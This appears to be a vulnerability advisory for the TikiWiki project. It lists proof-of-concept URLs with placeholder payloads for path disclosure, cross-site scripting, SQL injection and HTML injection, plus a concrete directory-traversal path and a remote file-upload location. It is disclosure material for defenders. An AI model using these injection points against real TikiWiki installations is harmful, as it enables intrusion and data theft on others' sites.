|
|
TikiWiki Project Multiple Input Validation Vulnerabilities
The following proof of concept examples have been provided: Path disclosure: tiki-searchindex.php?highlight=[JNK] messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode= messu-read.php?offset=[INT]&flag=&priority=&flagval= messu-read.php?offset=[INT]&flag=&priority= messu-read.php?offset=[INT]&flag= messu-read.php?offset= tiki-list_file_gallery.php?find=&galleryId=1&offset=[INT]&sort_mode= tiki-usermenu.php?find=&offset= tiki-usermenu.php?find=&offset=[INT]&sort_mode= tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode= tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset= tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[INT]&comments_maxComments= tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=priority_desc&find=[JNK] tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode= tiki-directory_ranking.php?sort_mode= tiki-file_galleries.php?find=&search=find&sort_mode= tiki-list_faqs.php?find=&offset=[INT]&sort_mode= tiki-list_faqs.php?find=&offset= tiki-list_trackers.php?find=&offset=[INT]&sort_mode= tiki-list_trackers.php?find=&offset= Cross-site scripting: tiki-switch_theme.php?theme=[XSS] messu-mailbox.php?flags=&priority=&find=[XSS] messu-mailbox.php?flags=&priority=[XSS] messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=date_desc&find=[XSS] messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=[XSS] messu-read.php?offset=[INT]&flag=&priority=&flagval=[XSS] messu-read.php?offset=[INT]&flag=&priority=[XSS] messu-read.php?offset=[INT]&flag=[XSS] messu-read.php?offset=[XSS] tiki-read_article.php?articleId=[VID][XSS] tiki-browse_categories.php?find=&deep=off&parentId=[VID][XSS] tiki-index.php?page=[VPG]&comments_threshold=[INT][XSS] tiki-print_article.php?articleId=[VID][XSS] tiki-list_file_gallery.php?galleryId=[VID][XSS] tiki-upload_file.php?galleryId=[VID][XSS] tiki-view_faq.php?faqId=[VID][XSS] tiki-view_chart.php?chartId=[VID][XSS] tiki-survey_stats_survey.php?surveyId=[VID][XSS] SQL injection: tiki-usermenu.php?find=&offset=[INT]&sort_mode=[SQL] tiki-list_file_gallery.php?find=&galleryId=[VID]&offset=[INT]&sort_mode=[SQL] tiki-directory_ranking.php?sort_mode=[SQL] tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=[SQL] tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[INT]&comments_sort_mode=[SQL] tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=[SQL] tiki-directory_ranking.php?sort_mode=[SQL] tiki-directory_search.php?how=or&words=&where=all&sort_mode=[SQL] tiki-file_galleries.php?find=&search=find&sort_mode=[SQL] tiki-list_faqs.php?find=&offset=[INT]&sort_mode=[SQL] tiki-list_trackers.php?find=&offset=[INT]&sort_mode=[SQL] tiki-list_blogs.php?find=&offset=[INT]&sort_mode=[SQL] tiki-usermenu.php?find=&offset=[SQL] tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[SQL] tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[SQL] tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[SQL] tiki-list_faqs.php?find=&offset=[SQL] tiki-list_trackers.php?find=&offset=[SQL] tiki-list_blogs.php?find=&offset=[SQL] HTML injection: User Profile > Theme User Profile > Country Field User Profile > Real Name User Profile > Displayed time zone Directory > Add Site > Name Directory > Add Site > Description Directory > Add Site > URL Directory > Add Site > Country Directory traversal: /tiki-map.phtml?mapfile=../../../../var/ Remote file upload: http://www.example.com/img/wiki_up/filenamehere |
|
Privacy Statement |